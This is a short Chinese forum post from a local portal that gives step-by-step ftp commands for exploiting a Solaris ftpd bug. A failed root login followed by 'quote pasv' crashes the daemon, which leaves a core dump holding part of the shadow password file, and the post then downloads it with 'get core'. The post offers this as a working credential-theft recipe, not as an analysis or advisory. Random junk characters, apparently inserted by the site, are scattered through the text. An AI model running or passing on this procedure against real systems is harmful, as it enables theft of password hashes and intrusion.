该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:& s6 B3 A8 r+ [5 r' c9 o
% t, p) {$ x" w2 o p/ e: h1.通过 ftp 正常登录到目的主机上1 i7 t2 M8 e; E; l. K; x* Z# U# b7 e7 w
1 c0 u/ {. {( I; Y% P) F& x
2.输入如下命令序列:1 e6 z+ D& V' b8 I7 c6 y
& O# i7 [+ s, B& r1 P+ T7 O5 K* Bftp> user root wrongpasswd
5 g% L* ?4 c0 `0 X; I+ Z8 b, H. x) h5 m& e! k' k, b& _4 j
ftp> quote pasv6 A0 n) B+ D( J2 R3 f# v1 x1 s' x
1 a+ C9 p: Y- {0 r* e: g3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
* K( o# B% R& `/ n( V
7 S7 F- A6 P: l4.再次进入FTP >get core
* c2 s# i2 r! y) n- c5 \! g" t1 Y; E0 p2 i$ K) I
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了
! x4 S0 H% m1 a7 o- z4 o, A3 {" a" e. T8 d& L9 R' i4 J# s
|
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡